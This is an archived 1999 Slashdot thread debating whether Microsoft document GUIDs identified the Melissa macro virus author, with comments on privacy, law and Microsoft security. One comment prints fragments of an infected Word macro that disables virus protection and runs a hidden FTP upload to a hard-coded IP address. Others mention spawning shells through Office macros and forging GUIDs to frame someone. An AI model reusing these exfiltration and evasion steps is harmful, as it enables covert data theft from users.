Become a fan of Slashdot on Facebook

 



Forgot your password?
typodupeerror
×
News

Melissa Creator tracked using MS's ID numbers? 330

So last week there was a lot of hype about Microsoft embedding IDs into documents that would allow tracing of authors. This week there was hype about Melissa- yet another lame doomsday macro virus (intentionally not posted here because I found it stupid). But mix the 2 together, and you get a story sent to us by stevew: the Melissa Virus can supposedly be traced to its creator using those annoying little ids. They don't have exact details, but the article says that it came from AOL.
This discussion has been archived. No new comments can be posted.

Melissa Creator tracked using MS's ID numbers?

Comments Filter:
  • by Anonymous Coward
    MSNBC has an article [msnbc.com] on the supposed "source" of the virus, and towards the bottom is a picture of the "original posting" to alt.sex [alt.sex]. You can make out the e-mail address of SkyRocket [mailto] believed to be the originator. Boy, I'd hate to have to check his e-mail tonight! ;-)

    EH
  • by Anonymous Coward
    HTML doesn't have viruses and know one cares who first wrote it.

    Whenever I try to put Unix in at our company there is always a fuss thrown by middle-managers; but when something like this happens, they shrug?
    Let's face it: Microsoft products are glitzy but they are not secure, not robust, and often not correct. It's time to back public protocols for business solutions and to be responsible by supporting correct and reliable standards and programs.
  • by Anonymous Coward
    What if Microsoft was behind the whole thing? This way, they can justify the use of the GUID's.

    It was just too easy to catch up to the culprit. I don't think any self-respecting cracker would leave such obvious fingerprints.

    Think about this too: This was a clever virus that used Outlook and Office to spread itself. Why didn't anyone do this before? Because only Microsoft programmers would think of such a thing!

    BTW... If anyone takes this post too seriously, then they need to take more humor lessons. :)
  • ...as Bill Clinton might say.
  • by Anonymous Coward
    Hmm... I think it is documented somewhere.
    At least it is ascii.

    I use Applixware and have found that RTF is
    the best way to exchange documents with
    the 'dark side' of the company. Things sorta
    go both ways without too much degradation.
    Even pictures.

    I'm trying to get them to send RTF when they
    mail documents to other people so we don't get
    those embarassing "your document has a virus"
    emails.

    -- cary
  • by Anonymous Coward
    Our civilization should have learned the
    hard way that diversity is good, and having
    a critical infrastructure based on identical
    systems is bad. The Irish potato blight comes
    to mind, as does health problems in race
    horses and Mr Morris's worm.

    Without diversity the whole infrastructure
    is 'brittle' wrt new threats. With diversity
    there is strength. That in itself should be
    reason enough to prevent one entity's
    domination of the information technology
    infrastructure, be that cisco, microsoft, intel,
    or even (gasp!) Linux.

    This is one of my pet peeves, and everyone needs
    a pet.

    -- cary
  • by Anonymous Coward
    /* anyone
    smart enough to engineer this type of thing would
    be smart enough to be able to cover their tracks.. */

    Nonsense. It's just a macro virus, not a balanced AVL tree. It doesn't take a genius to write a macro virus.
  • by Anonymous Coward
    I dunno. Maybe I'm paranoid. But I was thinking, "Yanno, If I were MS and I were catching flak for this whole privacy thing, I'd consider something like this."

    Their record shows they're not above dishonestey if they think it will advance their public image. They've never done anything quite so destructive in the past if you don't count inflicting Windows on us all, but I'm afraid I find the scenario plausible. I really believe that they would do this if they thought they could get away with it.

    Trust no one.
  • by Anonymous Coward
    /*

    Doesn't it scare people here what can happen to you for programming something on a computer? */

    No more than the conviction of Ted Kaczynski scared me about what could happen to me for making something in my kitchen. And like Kaczynski, it's a lot more scary knowing that malicious bastards are out there.

    Virus writers and crackers need to be given some serious jail time and fines. They cost the economy a great deal of money. They've been able to get away with this crap for way too long. I hope they catch the little SOB and throw the book at him.
  • by Anonymous Coward
    If you think about this, using the ID to track the writer is probably legal. After all, it's legal to use your fingerprints to convict you of a crime. IMHO this is no different. User happened to leave his dirty little fingerprints in a couple of places on the net. Open and shut book there.

    HOWEVER, this is also hardly more than circumstantial evidence. I bet it would be trivial to write a perl program to go out to j.random.word.document on the web, extract the GUID, and overwrite the GUID of a word document that you've created. If I were out to get someone (Like a competing cracker, for instance) that's exactly what I would do. The Melissa virus came out well after the news of the ID had been posted.

    If I used Microsoft products, I'd prove this by writing a program to do just that. Might have to borrow a 'doze box long enough to get a few word documents to play with. That's assuming a "Swap your GUID" script isn't already on rootshell for the script kiddies' downloading pleasure.
  • I'm sure that the law enforcement community can find some law that the Melisa author violated.

    But Microsoft has written code that (1) its purpose (and effects) are not disclosed (2) is purposely malicious to users (collecting GUID's, embedding irrelevant private hidden information in documents (I'm refering here to directory trees, other file contents etc.) (3) is widely desimenated without user knowledge (except for the "trojan" part e.g. wordprocessor, browser, etc.) (4) generates network packets that the user does not know about or initiate directly.

    Microsoft's motivation for these actions were profits and power. The virus writters motivation was? Microsoft has inflicted serious costs onto individuals, businesses, etc because of such software "hidden features." So even if intent is part of the statute, Microsoft had intent. It is harder to imprison a corporation than an individual, but fines etc. are easy to impose.

    ;-)
  • by Anonymous Coward
    There are people whose lives (not livelihood) depend on their anonymity. Suppose your document regarding government officials is intercepted on it's way to Amnesty International. This whole episode should give those government officials a pretty good idea how to track the culprits down if the document was written in Word. Thank god for ASCII and PGP!

    KN
  • by Anonymous Coward
    Life in prision? Death? For a freaking computer virus? Yes, I agree they cause lots of problems, but I don't think you should kill the dude!

    What would you get for a speeding ticket? Your right foot chopped off?
    (hey, this is beginning to sound like those middle eastern counties!)
  • by Anonymous Coward

    Kevin Mitnick accepted a plea bargain... and denied the Feds a show trial. He certainly wasn't going to get a fair trial, not after being held in jail for *four years* and denied reasonable access to the evidence in order to prepare a defense.

    Less than a week later Melissa is introduced... and now we learn of "proof" that the author was a known virus writer. The "proof" is that the MS GUID in the virus matches that readily available in documents posted on his web site.

    In other words, the "proof" is precisely as valid
    as my "proof" that I wrote Linux in 1972. After all, who can argue with the timestamp on the files?!


    Do I really believe this is a deliberate attempt to frame someone for political purposes? No. Do I believe that Kevin Mitnick is totally innocent and should have never spent a day in prison? No.

    But I *do* believe in history's lesson that the way we treat the Kevin Mitnick's and Larry Flynt's of the world today is how *we* will be treated tomorrow. I find it deeply disturbing that Kevin Mitnick, accused of *no* violence, was held prior to trial far longer than either Timothy McVeigh or Ted Ka^H^H^H^H the unabomer. It is signficiant that the latter two individuals faced the death penalty, while Mitnick will now be out within a year. Where is the justice in a system where an individual, even if acquitted, will spend the same amount of time in prison?!

    I further believe that nothing is more dangerous to freedom than a grandstanding prosecutor. The Communist witch hunts in the 50's are a classic example, and already I can hear the questions:

    Are you now, or have you ever been, a hacker?

    Do you now, or have you ever, associated with known hackers?

    The very real differences between "hackers" and "crackers" will matter no more than the differences between active Soviet sympathisers and the "fools" who didn't believe that 1950's America was the peak of human civilization and culture.

    The bottom line, today, is that any defense lawyer who uses this as a defense is an idiot. I would not convict on this evidence alone, but neither do I find it particularly likely that it is, in fact, a setup.

    The bottom line, tomorrow, is that the feds need to be careful with how they handle crackers because reasonable people *are* starting to ask questions about the way such cases are treated. The worst a cracker could do is a drop in the bucket compared to the damage caused by distrust of prosecutors. (Prime examples: AG Meese's comment that "there are, by definition, no innocent suspects" or Kenneth Starr effect on the debate over renewing the independent counsel law.)

  • I got a Word document emailed to me the other day -- since I was on a unix box at the time, I used 'strings' to have a quick look at it. Here is part of what I found (just the juicy bits):

    (Note: I'm pretty clueless as to the internal workings of Word documents, but it looks like the virus writer was kind enough to comment his/her code!)


    - this is a marker!
    Declare Variables
    Initialize Variables
    Switch the VirusProtection OFF
    HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info
    LogFile
    ' Log
    file -->
    ' Log
    file -->
    C:\hsf
    .sys
    c:\netldx.vxd
    o 209.201.88.110
    user anonymous
    pass itsme@
    cd incoming
    ascii
    put
    quit
    command.com /c ftp.exe -n -s:c:\netldx.vxd
    HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info
    LogFile
    Make sure that some conditions are true before we continue infecting anything
    Tru
    Infect the NormalTemplate
    ed = T
    alTe
    veDocu
    Write a log file of this NormalTemplate infection
    hh:mm:ss AMPM - $
    dddd, d mmm yyyy$
    ode
    ime, "
    Infect the ActiveDocument
    empl
    tiveDo
    mmm y
    Logfile -->3) &

  • by Anonymous Coward
    But will people really blame Microsoft? When we had gas
    shortages in the mid 70-s, I recall people
    blaming the Arabs, the oil companies, and the government.
    But few blamed the car manufacturers, who had
    been pushing gas-chugging monsters for more than a decade,
    or themselves, for buying those cars.

  • by Anonymous Coward
    If I remember correctly, Melissa & Melissa's "Poppa" get around the so-called "macro virus protection" in Office 97 by telling Office 97 to turn it off (without informing you). I don't think you should give M$ any credit at all.
  • by Anonymous Coward
    Those who would give up freedom for security will deserve and receive neither.
  • by Anonymous Coward on Tuesday March 30, 1999 @08:04AM (#1956782)
    5-10 years and $350,000? What the f*ck is that? Maybe Microsoft should be slapped with a class action lawsuit for setting up the infrastructure that allowed this virus to spread.

    This punishment does NOT fit the crime done. Basically, all this guy did was write some code (if you want to call it that). I will not deny the code was malicious, but we don't know why he did it. I could see someone trying stuff like this "just for the hell of it". Besides, if this guy hadn't done it, that security hole would have remained, and if it had been presented a year from now (presumably when even more people will be using email) it could have been MUCH worse.

    Basically, they are setting the punishment based on the fact that is scared the shit out of the FBI and lots of other people, not based on the actual crime commited.

    Doesn't it scare people here what can happen to you for programming something on a computer?
  • ...that you build your OWN slashdot? Rob, being the greedy selfish bastard he is, provided you with source code. All you gotta do is untar it, and start posting.

    In the mean time, in order to get back at him, might I suggest you:

    Stop contributing code.
    Cancel that membership check.
    Cancel that donation check.
    Halt shipment of that new hardware you sent.
    Stop contributing stories.
    Stop making helpful suggestions.

    Oh, wait, my bad, you DON'T do any of this. Ok, so that gives you... WHAT right to tell him how to run the site HE built, and HE funded, and HE works full time on?

    If YOU, being God and all, feel you can do a BETTER job, then do it. Surely one with your wisdom and 377373 news posting skills can build a better slashdot than slashdot. And when you do, the masses will flock to it... right?

    *If you make no effort to help, then DON'T knock a free service provided by the generosity of an (ex)student's heart!*

    Jackass...

    --

  • by Shiska ( 131 )

    ... if matched with a person, could lead law enforcement officials to the author of the prolific virus ...

    Uhm... "law enforcement officials" ? ... Since when was it illegal to write a virus?
    ----------------- ------------ ---- --- - - - -
  • What happened to privacy? Well, basically commercialism. Microsoft (or just about any company anymore) wants to get as much information as they can on users (refer to that whole banking deal a while back). They've got an OS, office program, various programming programs, all using proprietary file formats. Now considering all this is done with closed source, no specs on the file formats, etc, who's going to know that there's MAC address and whatever else they want to include in your Word document? All the meanwhile, they are crying, "Closed information is the only way to be secure!! Open source means you'll be hacked into!! Arggggggggggh!"

    Didn't the original articles on this information being in documents say something like it dated back even into the Windows 3.1 era? So, they've gotten away with it for all these years. And now we're starting to see just what these sort of companies want from us.

    Starcraft was sending all kinds of information from the registry to their battle.net servers if you typed an invalid password, as well. Of course they wrap it around, "We did it to help our customers, yeah, that's it, help them." And Intel really just put the ID in the P-III as a replacement for cookies, remember web page settings, sure.

    So all this is going on all these years, and people just don't care. They accept the products from giant corporations, and go with it.

    With all this going on, Open Source really can take the lead in security/privacy concerns. We need to shout, "Here are our guts, program code, file formats, etc. Critique them, find holes/problems." Only with open sources can people be REALLY sure none of these scrupulous programmers include this sort of information in files.
  • Or better yet, can two different MAC address possibly generate the same GUID?
  • It >may have once meant Revisable Text Format...but all documentation I've read of late calls it RICH Text Format (meaning that it can have font properties and color).
  • From the way I read it, it sounded like they didn't even need the GUID to catch the guy, they had already traced Patient Zero to the alt.sex newsgroup and had his AOL address, which they could easily turned into a real name and address with the correct warrent.
  • ...for me, at any rate.
    I use only MacOS and Linux, have never owned a copy of Word, and to the best of my knowledge there is nothing vaguely resembling a COM object anywhere on my system, even without my taking special precautions.
    Of course, in order to be able to say this I had to NOT USE MICROSOFT PROGRAMS, so obviously I'm the loony, right? It's just, well, not normal not to use Microsoft programs. Even Linux users use Microsoft programs (on the average). At least I have the consolation of this: it'll be easier for me to convince the FBI not to have me shot as owner of the GUID, because there's never been any indication that I _could_ write macro virii, due to my lack of Microsoft programs :)
    Such a world we live in! o_O
  • Methinks I'll go convert all my old Office documents into RTF.

    You mean, you haven't already? :P

    Mine are in RTF, plain text, and I'm thinking about trying out HTML (hate trying to get everything lined up correctly though).

  • I think it's time for a new format (OTF maybe?)

  • by DrSpoo ( 650 )
    There is nothing wrong with use PINE to do email. I have been for over a year and other than the fools that send me WINMAIL.DAT attachments it works fine! Hell, even works via telnet so I can be almost anywhere on the planet and still get my mail.
  • Posted by speed1:

    This just shows how MS programs with poor security can lead to a invasion of privacy.

    We can see in this case hows its being used to track the autor of Mellisa...how long will it take so they can track down anyone else.
  • Posted by tsturm:

    As for privacy, we should pay close attention to the development of all this. This is a mediatic demo for IDs and also for Clipper chips (so that the "bad guys" can be traced, right?). The supporters of those features and technologies will certanly use this as a showcase.

    On the other hand, doesnt the ease with which those GUIDs were traced suggest how easily everybodys privacy can be broken into?

    I would say that with the right spin (where are those privacy groups when you need them?) this case could be a perfect demonstration of what the GUID/Privacy issue a few weeks ago was all about.

    M$ blatantly mishandled their users privacy by putting GUIDs into each document that are so easy to be traced - even by outsiders, like those two guys from the ZDNet story.

  • Posted by Dr. Bert:

    I'm all for crucifiction of digital vandals. But this is a perfect example of why I refuse to use Microsoft products for any reason.
  • Posted by skitzo:

    I find it hard to believe that anyone could trust this stupid ID tracking system MS has embedded into their programs...I also don't know about the validity of this argument that they can even track the person who has created it. It seems like an overly bloated attempt to make something of nothing simply because of the quick spread of the virus. Lastly, anyone who has been infected ought to rethink their attempt to be computer savvy because it's obviously not working.


    lataz...
  • Posted by Bryan Lawson:

    Given that so many know vb, especially so many new young programmers who are still pumped with their rebel phase, and know (and have known for a LONG time - microsft?) how easy it is to create macro virii, I am surprised we haven't seen more Melissa types ages ago. We are certainly gunna see a lot more now, as the mutations and copies already surfacing show.

    I just hope the media pick up on the fact that this wouldn't (couldn't) happen if ms showed at least a modicum of respect for user level security.
  • Remember, Kenneth Starr couldn't tape record Monica Lewinsky's phone conversations w/o her consent or a warrant, but Linda Tripp could as she is a private citizen and not subjected to the same restrictions as law enforcement.

    Laws regarding recording phone conversations vary from state to state. In some states what Tripp did was perfectly legal ... in others, completely illegal and inadmissible by Starr. I guess he was lucky it was in DC. *grin*

    My point was that the illegal search argument would be what I would use as a defense since there is no clear precedence set in this regard. Information obtained by a 3rd party without the defendants knowledge is very shaky ground in court, especially when it's a commercial 3rd party as Microsoft is.

    If I planted a bug in your system (via a macro virus, yaay!) that logged all keystrokes and internet traffic, would I then be allowed to prosecute you when you went to a kiddie-porn site or downloaded the latest Quake III warez? I don't think so because I, as a 3rd party, violated your private space. I would actually be PROSECUTED as such. The argument can be made (and possibly successfully) that MS violated this person's private space by recording unique information about that space and broadcasting it publicly (even if embedded in a document now made public).
  • Essentially, MS Word does a type of digital signing on a document. If you release a signed file, well... too bad.

    Since this digital signature is hidden from the user completely, I disagree that once you release the document publicly, it's your fault the data got out.

    If Outlook attached your credit card number to each outgoing mail message without your knowledge, would you then be liable for all fraudulent purchases on that card since you sent an email? No, I don't think you would be.

    I don't see how someone can be held responsible for consequences of sending out data that they do not know is being sent.
  • Just as it's not a problem for the Gov't to take fingerprints off a letter that you sent or DNA samples from the saliva you used to lick a stamp or an emvelope shut. Once you voluntarially give something up, it's fair game for the man.

    I agree completely, except that until recently, no one even KNEW they were giving up their MAC address simply by publishing a Word document. Considering how new this knowledge is, it's safe to say that many STILL do not know.

    You can only voluntarily give up something you KNOW you have ... the unknown data attached to it without your consent by a 3rd party should not fall under these same rules.

    How many people (beyond slashdot) even KNOW what a MAC address is and how it's created?! I would venture a guess that 65% of computer users are clueless about this aspect of networking technology.
  • I will have to research the cases you site, thanks for pointing those out.

    I find it very hard to swallow however, that evidence gained from illegal activity is admissible in court in all instances. If this were the standing precedence, why wouldn't the cops simply get non-cops to break into people's houses to search when they can't get a warrant? Why wouldn't they get non-cops to plant bugs and cameras in crack houses to get evidence?

    I think there may be a fine (although gray) line between inadvertent discovery during a crime and out right pursuance of evidence during a crime. This may explain why if you found a body in my basement during a B&E, I would get charged but if you went in and planted a camera for the specific purpose to taping what I do in my own house and that tape caught the killing, that would not be admissible. (However, I'm sure it would be enough to get me arrested and the body found subsequent would be enough to convict me. *grin* There is a big difference between evidence required to arrest/detain and evidence required to convict.)

    To me this is a clear distinction. The MAC address is not attached to the word doc by chance, it was programmed to do that, specifically. This "theft" of unique personal data was not inadvertent, rather is was blatant.
  • First, the existence of the GUID in Word documents was not "recently discovered." It's part of the spec, and it's been known about for a long time.

    What spec? Since word documents use a proprietary format, I don't think there is an open spec available for inspection by the public. If there IS such a document, please point me towards it. If there is NOT such a document available to the public, then I would still consider embedded MAC addresses in .doc files as "recently discovered".

    The ZDNet article also goes into detail about how the GUID was matched with another GUID from a document on a website owned by a known virus author. Considering the uniqueness of the MAC addressed utilized in the GUID, it is highly unlikely, if not impossible that the two documents were not created by the same machine.

    The report never mentioned anything about using the gather MAC address from Windows 98 registrations to track down this person. Where are you getting that from?

  • Your points are very valid regarding current privacy statutes. My point was that this is uncharted waters and the argument could (should?) be made against 3rd party distribution of our unique data without our knowledge.

    People are well aware of Caller-ID and there is a publicly available mechanism to disable this feature. I have no problems with that.

    I'm not suggesting this argument to get around the crime itself, I'm suggesting it as a way to protect others from being victimized for non-criminal acts that my be unpopular.

    If it stands that 3rd parties can "implant" everything you do with an ID that you do not know about or cannot turn off, free anonymous speech will disappear as we know it. That's my main concern.
  • I wholeheartedly agree. Many are missing the bigger picture in this instance.

    If federal authorities USE this 3rd party tracking mechanism to convict, it will VALIDATE the notion that anyone, as long as they are not law enforcement, can implant people, their ideas, and their works with hidden identifiers to track them down at a later date.

    In many respects, this is similar, if not identical to key escrow.

    If this evidence IS used against this person, Bell Atlantic/Pac Bell may just start tapping our phone lines TOMORROW with the off chance that we will say something that can be used against us in court. It would be the same thing since it's a 3rd party, NOT law enforcement, invading our privacy to gather evidence against us.
  • by DaBuzz ( 878 ) on Tuesday March 30, 1999 @08:34AM (#1956805) Homepage
    I'm not sure if use of such GUID's would hold up in court since it is private information gathered by an illegal search. The user did not give permission for his unique ID to be attached to his .doc file. The app (Word) had no just cause to attach this ID either so it's similar to having the feds tap your phone without a warrant.

    While I am not defending this moronic macro virus creator, I do think that utilizing these GUID's is setting a BAD standard in regards to a person's right to publish anonymously.

    What's next, they track down the GUID of the person who wrote an anti-Clinton .doc and posted it online?
  • It used to be that the biggest security hole in any network was a badly configured firewall (or lack thereof), now it's MS Word and MS Outlook!

    I can just see the day this was decided at The Collective ...

    [Insert wavy flashback effect]

    Five of Seven: "Hey, Three of Five, let's give Word the ability to run external executables!"

    Three of Five: "Cool! But let's make it so that it can do this from within a macro!"

    Five: "Sounds good. How about we add a startup macro that launches when the document is opened?"

    Three: "Hmm, should we allow the user to turn off startup macros?"

    Five: "Hahaha! What for? No one is going to use this for evil! This is a Good Thing[tm]!"

    [Fade back to present]

    Sad, just plain goddam sad.
  • This just gets down to the point.. we really need easier ways for government and industry to track our movements. Perhaps something injected into the arm at birth that would constantly relay a signal to a series of receivers? This way we can easily track those evil criminals and bad people and find lost children and do all kinds of good stuff. :-) *sarcasm*
  • Hey, I like word macros.

    How else are you supposed to get a shell on a system that's "secured"? (okay, I know, there are tons of ways, like Excel macros, or not-disabled Windows function keys, or changing, say, the Telnet proxy in netscape to run the command interpreter...)

    I think one of my favorite oxymorons is "Windows Security". It's a good analogy, too. Want to break into a house? Break a window.
  • Heh. I'd been thinking the same exact thing when I saw this headline on the front page. Gee, wouldn't it be interesting...
  • My understanding was that it was a VBscript macro virus. So basically, unless you open a Word/Excel/whatever document up that contains the macro virus, it has no scripting host to run on, so you can't pick it up that way.
  • My understanding was that it was a VBscript macro virus. So basically, unless you open a Word/Excel/whatever document up that contains the macro virus, it has no scripting host to run on, so you can't pick it up that way.
  • Did you READ the article?

    If you had, you'd note that it said the GUID number is in part based on the MAC address of the system's Ethernet card. Please, read the article next time. You'll be more informed, and everyone will be happier.
  • Absolutely! It is a very slippery slope, and we've already started down it. I notice that ID chip implants are already becoming common for pets. That gets the chips into mass manufacture, and gets the chip readers out there.

    The next 'great beneficial use' will probably be the mentally infirm. Once it helps out there, children will be next. Don't be surprised to find out it's a lot easier to get the chip implanted in a 3 year old than it is to have it REMOVED from an 18 year old. (beyond the fact that it's harder to dig one out than to put one in).

  • That some loser on AOL wrote a virus for the biggest abomination of an office suite on the planet? This goes back to the monkey theory, I think. Heh. :)
  • First of all, some of the mailservers were put out of operation, and some sites had to disconnect mail service. That's harm.

    Second, the change in machine state causing an undesirable activity is vandalism. Painting the next Mona Lisa on the side of a building would be vandalism, even if the owner was then able to sell the wall for $1M.

    Third, while it may impose no additional cost to the victim, sending mail from his machine was an act with economic value; the improper use is theft and/or trespass.

    Fourth, the message sent would be likely to cause problems between the sender & recipient.

    I see no way in which the virus *isn't* harmful.

    hawk, esq.
  • If you're looking for me to argue that MS products are any good, look elsewhere :) The last ones I have *anything* non-negative to say about are word 5.1 and excel 4.

    But harmful as the products may be, and even if they're more dangerous than the virus, the fundamental legal difference is permission (except for transmission of data to microsoft, which would also violate assorted laws)

    hawk, esq.
  • It's not the *writing*, but the willful and knowing *release* of the virus that's a crime.

    The Common Law, and I presume most other legal systems, attribute the same intent to the natural consequences of an act as the act itself. Even without any modern "computer" crimes, the release & spread created numerous criminal trespasses against chattels (improper contact with machine), vandalism, and (the law of the individual state permitting) a general common law misdemeanor.

    Larceny (theft) probably wouldn't cut it in this case, as an element is the intent to permanently deprive.

    hawk, esq.

    And no, this isn't legal advice.
  • by Masem ( 1171 ) on Tuesday March 30, 1999 @07:58AM (#1956818)
    While I am probably being paranoid and overly
    sceptical, it's way too convinent that the
    Win98 ID bug, only uncovered recently, is
    suddenly going to be the life saver for solving
    the Melissa problem. And all only 2 weeks
    before the anti-trust trial resumes.

    But, even if this is the case, I really wish
    there was something that could be done against
    M$ for introducing the entire concept of Word
    viruses to the world; if they had introduced
    the security needed into the vis basic routines
    when they first put out Word 6, things wouldn't
    be as rampent now.

    Plus, this only goes to show that when only
    one company makes all the programs that you use,
    it's rather easy to find all the loopholes between
    them all. (Hint, there's better, more
    established ways to do interprocess communiction
    that a propriatary system).
  • the interesting thing is that the virus doesn't *DO* anything harmful, except spam mailservers.


  • Since a word document only has the GUID of the original document author, and all these Word Macro viruses are made by taking somebody else's Word Macro Virus (WMV) document and modifying it, all the GUID does is point back at some guy who wrote the original WMV that was the grandfather of Melissa. See this article [zdnet.com]
    for more details.
  • [Don Box] wrote this script that generates GUIDs in the open...

    Oh? And have you seen how this site assigns you a cookie too?

    If he wanted to be bad, now he could pair GUID's and your cookies...

    Of course I don't care about it, even if I would, the reasoning to let him generate a GUID for you is a bit weird.

  • This is the worst kind of bloat I can imagine - a fancy text editor mated to a BASIC interpreter. Granted the usefulness of an integrated development environment in your word processor, it is doubly insane to permit programs to run automatically when the document is opened.

    And this is different than Emacs how?

    Oh, I forgot, Emacs uses Lisp.

  • In point of fact, a user must already have write access to your .mailrc and .emacs files (implying that your account was already insecure) to instigate the sort of "virus" you've pointed out above.

    NO!

    Vi used to execute the .exrc file in any directory, including /tmp. You would simply leave a nasty .exrc file in /tmp, wait for people to use a program such as a mail reader that forks off a copy of vi to edit a temporary file and *poof*, you have got them!

    With Emacs, you can put the special tags in any file, and if the are close enough to the start of end of the file, they used to be silently executed. Just email someone with the tags at the end, and if it is the last message in the mail box, *poof* you have got them!

    Ten years ago, these were the *DEFAULTS* for two of the most popular editors on UNIX. They were used in universities which had large numbers of users. UNIX was the most common OS on the Internet. It was a serious problem. The UNIX folks had to learn to set the defaults correctly, just like I hope MS (and other software companies) learns. It is just too bad they didn't learn from the past.

  • Before anyone gets too carried away about the evils of closed source software, it should be remembered that both VI and Emacs have had similar problems, although they were "fixed" many years ago.

    VI used to read any ".exrc" file in the current directory, which could be used to create macro virii. To the best of my knowledge, this option is now turned off by default. (I don't use vi much...)

    Emacs will execute code that is embedded in a file if it has the right tags around it. For example, I have this glob at the end of my .mailrc file:

    # hack-o-rama

    # local variables:
    # mode: text
    # write-file-hooks: ((lambda () (let ((xyzzy (make-temp-name "/tmp/foo"))) (condition-case () (progn (message "Rehacking aliases...") (write-region (point-min) (point-max) xyzzy nil 'foo) (build-mail-aliases xyzzy) (delete-file xyzzy)) (file-error nil))) nil))
    # end:
    About 10 years ago, emacs was changed from automatically and silently running this kind of code, to having the code displayed to the user and a y/n prompt given. Before that time, it was possible to trick Emacs's RMAIL command to propogate a virus through email.

    Still, I am not sure that Emacs's solution is that great. You can still turn the prompting off, and it assumes that the user knows enough about Emacs and Lisp to understand the code.

    I think the real difference between OSS and MS is that OSS ran into these problems long before the Internet became aware to the general public.

  • not a month ago, we were having such a fit about MS IDs, and now, a *news-making* macro virus hits, and, TADA! A legitimate use is found for the MS ID.

    Too, too funny. Nice try, Microsoft.
  • User space has nothing to do with it. Or do you suddenly not have the ability to send email from the command line from your user account?

    The reality of this is that StarOffice suffers from the same problem, especially since it can run MS Office macros.
  • You know, I think what scares me most about this is that the punishment in the US for a computer crime is tougher than the punishment for lots of other crimes. Oh, say, domestic abuse or something like that. So, it's worse for someone to write a macro virus than to slap their wife or girlfriend around.(husband or boyfriend too just to be P.C.) There's something basically wrong with that.

    I've had computer viruses. Monkey2 and Ripper to be specific. I remember how utterly frustrating they both were. I do think that there are things much worse however. Keep it in perspective is all I can say.

    I dunno. I guess what it comes down to is that I think this says something about our misplaced & completely fucked up value system.

    -Randy

  • But that would be too obvious.
  • In point of fact, a user must already have write access to your .mailrc and .emacs files (implying that your account was already insecure) to instigate the sort of "virus" you've pointed out above. Also the code that enables this sort of behaviour is not found in the default versions of these files distributed by OS or application vendors. MS products are *BY DEFAULT* vulnerable, and the malicious user needs no special access to your machine or files to propagate his attack. This is not the case on most other properly administered and installed OS's.
  • Yet another wonderful aspect of this invasion of privacy is that anyone with a clue could frame anyone that person could get a sample doc from. Releasing the Skyrocket address to the net at large was irresponsible behaviour based on what amounts to heresy based on an invasion of privacy.
  • I grabbed the Melissa virus from the original alt.sex post and wanted to take a look at it, purely for educational purposes of course. I couldn't find any UNIX tools to do so!

    As you pointed out, while strings will give you some juicy tidbits, you can't extract the full macro contents that way (does MS tokenize their VB text?). Neither word2x nor mswordview do anything with macros. LAOLA [tu-berlin.de] includes a tool called ELSER which dumps out embedded macros, but it doesn't work with Word97 documents (which Melissa is). The mswordview [csn.ul.ie] site even linked to a DOS program called List Word Macros [wisc.edu] which I tried, and it doesn't support Word97 either.

    I'd really like to see a dump of this virus, because I'm curious to see exactly what kind of insecurities a macro language would need to have in order to let the author both scan an address book and send email, without doing anything too suspicious in the UI. Does anyone have any better tools for looking at this file?

  • Regardless of the privacy implications of GUID storage in Microsoft documents this story is fishy. There's a vast number of documents written with these products and thus a vast number of GUID's floating about on the internet. To be able to pull up an individual and point the finger at them this quickly is unrealistic, especially given that they say that they found the matching GUID on a web site. They would have to exhaustively search web sites for documents containing the GUID and perform a match on them in order to do this.

    The size of the internet says that this isn't possible. If there is any truth to the story at all it means that this guy was under some other form of surveillance and for that reason his documents were specially selected to be matched. Or it could mean that some portion of this is a sham, maybe the guy was never caught, maybe it was a propoganda ploy by either Microsoft or somebody who boosts Microsoft.

    Until this story is confirmed by a somewhat credible news site I'll chalk off the capture of the perpetrator as an urban legend.
  • have recieved reports from catdoc users, that they was able to read future plans of their bosses, which wasn't intended to be sent just now.

    yeah, that's a feature of word's "fast save": it uses versioning. so the old text is still there, but not displayed!!

    I heard of someone who used catdoc on a job offer he got, and he was able to read the money they had offered to another person!!

    and to think the corporate word relies on Word!!
  • by acb ( 2797 )
    Couldn't the feds press charges of terrorism, which carries very severe penalties (life imprisonment and the death penalty are both options) against the virus author? Maybe someone will figure that if they make an example of one cracker, others will be "scared straight".
  • by acb ( 2797 )
    Since when was it illegal to write a virus?

    Since a few virus scares back when politicians passed a specific law about writing viruses (or so I recall).
  • In this age of information, terrorism need not be physical. With most wealth existing as information outside of physical reality, and companies founded on the shuffling of bits, an "infowar" attack against a strategic economic target could do much more damage than any reasonable number of car bombs. Why blow up the Yoyodyne building when you can instead shoot down their stock price, decimating their value and causing much more damage? Or if that's not spectacular enough, cripple their communications system.

    Which is not to say that Melissa is a political or economic terrorist attack, though the age of electronic, entirely non-physical terrorism is coming. It makes much more sense. The future of terrorism looks more like the Sense/Net raid from Neuromancer than the World Trade Center bombing.
  • It's kinda funny to see the letters AOL on anything that has to do with remotely stupid things.

    Though I'm still not sure what frightens me the most; "Virus" coders who leave the door open for prosecutors, M$ software that enables people to track down the author of some word document or thousand of alt.sex regulars who open a .doc file wich they found on usenet and dont disable macros.

    Strange Times... the future sure should get funny
  • Executable documents are just plain wrong.
    No, they can be made secure and sometimes they can even be useful (especially when you use interactive documents instead of regular applications, for example in a list that checks the consistency of new entries). The problem is that it is extremely difficult to make this secure, and it looks like Microsoft is not putting much effort in making VBA programs embedded in Office documents very secure.
    Netscape is quite successful at making HTML+Java/-script quite safe. They are not perfect, as the technology is evolving much too quick, but it is definately a proof-of-concept.
    (The above paragraph should not leave you with the impression that using Javascript on a HTML page is a good thing - of course you should use LML and Javascript is evil).
  • I think your argument is misguided:

    This GUID only applies to macro viruses (for MS office programs) or for viruses compiled with an MS compiler. Anyone who wanted to eliminate identity traces could, without too much difficulty, hand craft virus code (either hand assemble, or something similar) to not only eliminate all traces of his/her identity, but also streamline the virus to be leaner and meaner.

    As far as I understand the Ethernet specification, although the MAC address, upon which the GUID is based, is set in the factory, it is supposedly resetable by the user with a special utility. (In other words the ID number that is being tracked can be changed.)

    So, basically, only malicious hackers who don't know what they are doing, or innocent bystanders will be tracked... also, said hacker could easily fram someone else.

    Also, I don't see your justification for assuming everyone who advocates privacy is guilty. Have you ever said anything illegal on the phone? (I doubt it... almost anything you could say on the phone is protected under the 1st ammendment.) That said, would you be mad if I suggested all the phone calls you ever made were taped, and would be played before a grand jury? I know I would be livid.

    Note: I used the the word "hacker" above (and not "cracker") because a "cracker" is one who cracks into other's systems. Not all malicious "hackers" are "crackers". Whether writing a virus to attack other's systems constitutes cracking, I will leave as an exercise for the reader.

